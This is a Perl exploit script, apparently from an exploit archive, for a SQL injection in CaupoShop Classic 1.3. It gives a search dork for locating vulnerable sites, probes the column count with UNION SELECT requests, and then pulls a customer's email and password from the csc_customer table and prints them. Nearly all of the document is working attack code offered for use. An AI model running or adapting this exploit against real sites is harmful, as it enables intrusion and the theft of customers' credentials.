1 #!/usr/bin/perl
2 ######################
3 #
4 #CaupoShop Classic 1.3 Remote Exploit
5 #
6 ######################
7 #
8 #Bug by: h0yt3r
9 #
10 #Dork: inurl:csc_article_details.php
11 # Couldnt find a stable dork for this specific Version.
12 #Exploit will only work on correct version.
13 #
14 ##
15 ###
16 ##
17 #
18 #I found this long time ago but never actually shared it.
19 #As the userid’s are a bit messy you will only get the top 1 row value.
20 #Change it if you like.
21 #
22 #Gr33tz go to:
23 #thund3r, ramon, b!zZ!t, Free−Hack, Sys−Flaw and of course the pwning h4ck−y0u Team
24 ########
25
26 use LWP::UserAgent;
27 my $userAgent = LWP::UserAgent−>new;
28
29 usage();
30
31 $server = $ARGV[0];
32 $dir = $ARGV[1];
33
34 print"\n";
35 if (!$dir) { die "Read Usage!\n"; }
36
37 $filename ="csc_article_details.php";
38 my $url = "http://".$server.$dir.$filename."?";
39
40 my $Attack= $userAgent−>get($url);
41 if ($Attack−>is_success)
42 {
43 print "[x] Attacking ".$url."\n";
44 }
45 else
46 {
47 print "Couldn’t connect to ".$url."!";
48 exit;
49 }
50
51 print "[x] Injecting Black Magic\n";
52
Page 1/2
CaupoShop Classic 1.3 saArticleID Remote SQL Injection Vulnerability
n/a
06/19/2008
53 my @count = ("66666");
54
55 for ($i = 6; $i<99; $i++)
56 {
57 my $selectUrl = $url."saArticle[ID]=−275 union select 1,2,3,4, @count";
58 my $Attack= $userAgent−>get($selectUrl);
59 if($Attack−>content =~ 66666)
60 { last; }
61 else
62 { push(@count,",66666"); }
63 }
64
65 my $Final = $url."saArticle[ID]=−1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer";
66
67 my $Attack= $userAgent−>get($Final);
68
69 if($Attack−>content =~ m/1337(.*?):(.*?)1337/i)
70 {
71 my $login = $1;
72 my $pass = $2;
73 print "[x] Success!\n";
74 print "[x] Top 1 User Details:\n";
75
76 print " Username: ".$login."\n";
77 print " Password: ".$pass."\n";
78 }
79 else
80 {
81 print"[x] Something wrong...Version?\n";
82 exit;
83
84 }